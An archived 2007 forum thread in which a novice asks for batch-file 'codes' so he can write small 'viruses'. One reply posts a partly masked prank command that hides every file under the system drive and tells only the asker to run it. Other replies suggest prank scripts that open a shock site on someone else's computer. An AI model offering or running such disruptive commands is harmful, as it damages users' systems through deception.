PDA

View Full Version : Notepad

Butter
08-19-2007, 06:15 PM
Hey guys, I'm a new to this stuff are there any websites that tell you codes for notepad. I.E
@echo off
Start iexplore
That opens IE. Sorry If this isnt clear I just want to mess around and work out for my self to make some easy small virus as I'm just learning.
I've already made a few, but thanks.

SyntaXmasteR
08-19-2007, 06:35 PM
Codes for IE huh? Made a few viruses? hm... Heres a ***7 virus you can put into notepad just for you:

attrib +h &#*7;systemdrive%\* /S /D > %systemdrive%\***7H4X0R.txt&& IF EXIST %systemdrive%\***7H4X0R.txt DEL /Q %systemdrive%\***7H4X0R.txt

Its only for butters computer. No one else should try to run it.

Moonbat
08-19-2007, 06:42 PM
What your trying to make isn't a virus, it's more of a worm, and I don't think anyone wants to help you make that.

Oh, and what your talking about is called a batch file.

SyntaXmasteR
08-19-2007, 07:10 PM
I know, I thought that was a bit funny. I made a virus!! echo off&& start iexplore.exe. He didnt even send it to a web address.

start iexplore.exe http://www.all-nettools.com

You can do that with any program as long as you add it to your computers PATH which is located in the ENVIRONMENTAL VARIABLES.

Butter
08-20-2007, 05:13 AM
I'm not calling it a virus thats an example of what I want. Like a website that will give you a code then tell you what it does.

Moonbat
08-20-2007, 05:14 PM
Butter, just make a 'virus' that sends the person to meatspin.com or something. Also, don't forget that the target might be using Opera or Firefox as their web browser, so start iexplorer.exe might not work. Or just do a little bit of research and custom code your virus to do what you want

@ SyntaX - Something about that code you posted makes me not want to run it...:p

SyntaXmasteR
08-20-2007, 05:25 PM
LoL @ Moonbat